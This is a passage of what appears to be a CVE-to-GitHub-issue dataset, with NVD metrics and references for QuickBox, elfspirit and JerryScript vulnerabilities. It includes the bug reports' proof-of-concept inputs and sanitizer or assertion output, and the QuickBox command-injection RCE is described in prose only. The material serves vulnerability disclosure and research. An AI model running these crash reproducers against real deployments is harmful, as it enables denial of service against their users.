cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2021-44981 | 2022-01-24T13:15:08.177 | In QuickBox Pro v2.5.8 and below, the config.php file has a variable which takes a GET parameter value and parses it into a shell_exec(''); function without properly sanitizing any shell arguments, therefore remote code execution is possible. Additionally, as the media server is running as root by default attackers can use the sudo command within this shell_exec(''); function, which allows for privilege escalation by means of RCE. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/QuickBox/QB/issues/202"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://websec.nl/blog/61b2b37a43a1155c848f3b08/websec%20finds%20critical%20vulnerabilities%20in%20popular%20media%20server"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/QuickBox/QB/issues/202"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://websec.nl/blog/61b2b37a43a1155c848f3b08/websec%20finds%20critical%20vulnerabilities%20in%20popular%20media%20server"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:quickbox:quickbox:*:*:*:*:community:*:*:*",
"matchCriteriaId": "539517B3-AB8A-42AE-AD72-D337662A5FA1",
"versionEndExcluding": null,
"versionEndIncluding": "2.5.8",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:quickbox:quickbox:*:*:*:*:pro:*:*:*",
"matchCriteriaId": "AB153559-7B02-40EA-B473-1D7E0D2EA171",
"versionEndExcluding": null,
"versionEndIncluding": "2.5.8",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"78"
] | 78 | https://github.com/QuickBox/QB/issues/202 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"QuickBox",
"QB"
] | Hey there!
I belong to an open source security research community, and a member (@websecnl) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a `SECURITY.md` file with an email, or another contact method? GitHub [recommends](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper) | Responsible disclosure policy | https://api.github.com/repos/QuickBox/QB/issues/202/comments | 9 | 2021-12-09T10:22:21Z | 2022-02-03T11:42:53Z | https://github.com/QuickBox/QB/issues/202 | 1,075,401,997 | 202 | 3,080 |
CVE-2022-21711 | 2022-01-24T20:15:08.657 | elfspirit is an ELF static analysis and injection framework that parses, manipulates, and camouflages ELF files. When analyzing the ELF file format in versions prior to 1.1, there is an out-of-bounds read bug, which can lead to application crashes or information leakage. By constructing a special format ELF file, the information of any address can be leaked. elfspirit version 1.1 contains a patch for this issue. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.2,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/liyansong2018/elfspirit/commit/c5b0f5a9a24f2451bbeda4751d67633bc375e608"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liyansong2018/elfspirit/issues/1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/liyansong2018/elfspirit/security/advisories/GHSA-jr8h-2657-m68r"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/liyansong2018/elfspirit/commit/c5b0f5a9a24f2451bbeda4751d67633bc375e608"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/liyansong2018/elfspirit/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/liyansong2018/elfspirit/security/advisories/GHSA-jr8h-2657-m68r"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:elfspirit_project:elfspirit:*:*:*:*:*:*:*:*",
"matchCriteriaId": "984FF703-F7AC-4EE2-A048-E5EE4DCC33F4",
"versionEndExcluding": "1.1.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/liyansong2018/elfspirit/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"liyansong2018",
"elfspirit"
] | poc
```shell
$ ./elfspirit parse id_000000
```
log
```shell
[+] ELF Header
e_type: 3 -> A shared object
e_machine: 62 -> Intel 80386
e_version: 1 -> Current version
e_entry: 4176
e_phoff: 64
e_shoff: 13608
e_flags: 0
e_ehsize: 64
e_phentsize: 56
e_phnum: 9
e_shentsize: 64
e_shentsize: 64
e_shstrndx: 27
[+] Section Header Table
[Nr] Name Type Addr Off Size Es Flg Lk Inf Al
AddressSanitizer:DEADLYSIGNAL
=================================================================
==193419==ERROR: AddressSanitizer: SEGV on unknown address 0x7f08638c5000 (pc 0x7f0842727231 bp 0x7ffcbf981330 sp 0x7ffcbf980ad8 T0)
==193419==The signal is caused by a READ memory access.
#0 0x7f0842727231 (/lib/x86_64-linux-gnu/libc.so.6+0x15f231)
#1 0x7f08427c9a8c in __interceptor_strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:368
#2 0x55862b528026 in parse /home/lys/Tools/elfspirit/parse.c:975
#3 0x55862b4c5167 in readcmdline /home/lys/Tools/elfspirit/main.c:251
#4 0x55862b4c5167 in main /home/lys/Tools/elfspirit/main.c:263
#5 0x7f08425efe49 in __libc_start_main ../csu/libc-start.c:314
#6 0x55862b4c5d09 in _start (/home/lys/Tools/elfspirit/elfspirit+0x9d09)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x15f231)
==193419==ABORTING
```
[poc.zip](https://github.com/liyansong2018/elfspirit/files/7920475/poc.zip)
| Out-of-bounds read in elf parsing. | https://api.github.com/repos/secnotes/elfspirit/issues/1/comments | 0 | 2022-01-23T12:32:42Z | 2022-03-28T15:50:55Z | https://github.com/secnotes/elfspirit/issues/1 | 1,111,858,333 | 1 | 3,081 |
CVE-2021-44988 | 2022-01-25T01:15:07.640 | Jerryscript v3.0.0 and below was discovered to contain a stack overflow via ecma_find_named_property in ecma-helpers.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4890"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4891"
},
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4890"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4891"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/jerryscript-project/jerryscript/issues/4891 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: [51da1551](https://github.com/jerryscript-project/jerryscript/commit/51da15516e1436184be9914314f76d596f14cd27)
Version: v3.0.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)
###### Build steps
```bash
./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20
```
###### Test case
```javascript
let array = new Array(1);
array.splice(1, 0, array);
array.flat(Infinity);
```
###### Execution steps & Output
```bash
$ ./jerryscript/build/bin/jerry poc.js
ASAN:DEADLYSIGNAL
=================================================================
==37207==ERROR: AddressSanitizer: stack-overflow on address 0xff6f2ffc (pc 0x566c8fbc bp 0xff6f3040 sp 0xff6f3000 T0)
#0 0x566c8fbb in ecma_find_named_property /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:618
#1 0x56a91e1f (/root/jerryscript/build/bin/jerry+0x477e1f)
SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/ecma/base/ecma-helpers.c:618 in ecma_find_named_property
==37207==ABORTING
``` | Stack-overflow in ecma_find_named_property (ecma-helpers.c) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4891/comments | 1 | 2021-12-09T14:33:33Z | 2021-12-09T14:35:17Z | https://github.com/jerryscript-project/jerryscript/issues/4891 | 1,075,642,418 | 4,891 | 3,082 |
CVE-2021-44992 | 2022-01-25T01:15:07.690 | There is an Assertion ''ecma_object_is_typedarray (obj_p)'' failed at /jerry-core/ecma/operations/ecma-typedarray-object.c in Jerryscript 3.0.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4875"
},
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4875"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"119"
] | 119 | https://github.com/jerryscript-project/jerryscript/issues/4875 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: [51da1551](https://github.com/jerryscript-project/jerryscript/commit/51da15516e1436184be9914314f76d596f14cd27) Version: v3.0.0
Commit: [8ba0d1b](https://github.com/jerryscript-project/jerryscript/commit/8ba0d1b6ee5a065a42f3b306771ad8e3c0d819bc) Version: v2.4.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20
```
###### Test case
```javascript
function isPoT(obj, name, type) {
let desc;
desc = Object.getOwnPropertyDescriptor(obj, name);
return typeof type === 'undefined' || typeof desc.value === type;
}
function getPs(obj, type) {
let properties = [];
for (let name of Object.getOwnPropertyNames(obj)) {
if (isPoT(obj, name, type)) {
properties.push(name);
}
}
return properties;
}
function* genObj(root = this, level = 0) {
if (level > 4) {
return;
}
let obj_names = getPs(root, 'object');
for (let obj_name of obj_names) {
if (obj_name.startsWith('$')) {
continue;
}
let obj = root[obj_name];
yield obj;
yield* genObj(obj, level + 1);
}
}
function JSEtestObj() {
let objects = [];
for (let obj of genObj()) {
if (!objects.includes(obj)) {
objects.push(obj);
}
}
return objects;
}
function JSEtestFunc(obj) {
return getPs(obj, 'function');
}
const thrower = new Proxy({}, {
get() {
throw 0xc0defefe;
}
});
for (let o of JSEtestObj()) {
for (let f of JSEtestFunc(o)) {
const arityPlusOne = o[f].length + 1;
try {
o[f](Array(arityPlusOne).fill(thrower));
} catch (e) {
if (`${e}`.includes('1')) {
try {
new o[f](Array(arityPlusOne).fill(thrower));
} catch (e) {}
} else {
}
}
}
}
```
###### Execution steps & Output
Version: v3.0.0
```bash
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'ecma_object_is_typedarray (obj_p)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c(ecma_get_typedarray_id):764.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
Version: v2.4.0
````bash
$ ~/jerryscript-2.4.0/build/bin/jerry poc.js
Script Error: assertion failed
Script backtrace (top 5):
0: poc.js:72
````
Credits: Found by OWL337 team. | Assertion 'ecma_object_is_typedarray (obj_p)' failed in ecma-typedarray-object(ecma_get_typedarray_id) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4875/comments | 0 | 2021-12-09T09:08:53Z | 2022-01-12T02:06:25Z | https://github.com/jerryscript-project/jerryscript/issues/4875 | 1,075,325,382 | 4,875 | 3,083 |
CVE-2021-44993 | 2022-01-25T01:15:07.730 | There is an Assertion ''ecma_is_value_boolean (base_value)'' failed at /jerry-core/ecma/operations/ecma-get-put-value.c in Jerryscript 3.0.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4876"
},
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4876"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/4876 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: [51da1551](https://github.com/jerryscript-project/jerryscript/commit/51da15516e1436184be9914314f76d596f14cd27)
Version: v3.0.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20
```
###### Test case
```javascript
function JSEtest(f, n = 1000) {
for (let i = 0; i < n; i++) {
f();
}
}
JSEtest(function () {
class M {
constructor() {
this._x = 45;
}
get foo() {
return this._x;
}
}
class N extends M {
constructor(x = () => super.foo) {
super();
x() === 45;
}
x(x = () => super.foo) {
return x();
}
}
new N().x() === 45;
});
```
###### Execution steps & Output
version 3.0.0
```bash
$ ./jerryscript/build/bin/jerry poc.js
ICE: Assertion 'ecma_is_value_boolean (base_value)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-get-put-value.c(ecma_op_get_value_object_base):205.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
Credits: Found by OWL337 team. | Assertion 'ecma_is_value_boolean (base_value)' failed in ecma_op_get_value_object_base (ecma-get-put-value). | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4876/comments | 0 | 2021-12-09T09:48:50Z | 2022-01-12T02:06:45Z | https://github.com/jerryscript-project/jerryscript/issues/4876 | 1,075,367,669 | 4,876 | 3,084 |
CVE-2021-44994 | 2022-01-25T01:15:07.773 | There is an Assertion ''JERRY_CONTEXT (jmem_heap_allocated_size) == 0'' failed at /jerry-core/jmem/jmem-heap.c in Jerryscript 3.0.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4894"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4895"
},
{
"source": "cve@mitre.org",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4894"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/4895"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://security.samsungmobile.com/securityUpdate.smsb"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/jerryscript-project/jerryscript/issues/4894 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ## JerryScript commit hash
55acdf2048b390d0f56f12e64dbfb2559f0e70ad
## Build platform
Ubuntu 20.04 LTS
## Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g \
--strip=off --system-allocator=on --logging=on \
--linker-flag=-fuse-ld=gold --error-messages=on --line-info=ON \
--stack-limit=10
```
## poc
```
var sab = new SharedArrayBuffer(4);
var a = new Int32Array(sab);
Atomics.add(a, -0, 1);
```
## assert log
```
ICE: Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):108.
Error: ERR_FAILED_INTERNAL_ASSERTION
``` | Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at /home/sakura/jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):108. | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4894/comments | 1 | 2021-12-09T14:53:08Z | 2022-01-14T09:05:39Z | https://github.com/jerryscript-project/jerryscript/issues/4894 | 1,075,663,454 | 4,894 | 3,085 |
CVE-2021-44994 | 2022-01-25T01:15:07.773 | There is an Assertion ''JERRY_CONTEXT (jmem_heap_allocated_size) == 0'' failed at /jerry-core/jmem/jmem-heap.c in Jerryscript 3.0.0. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
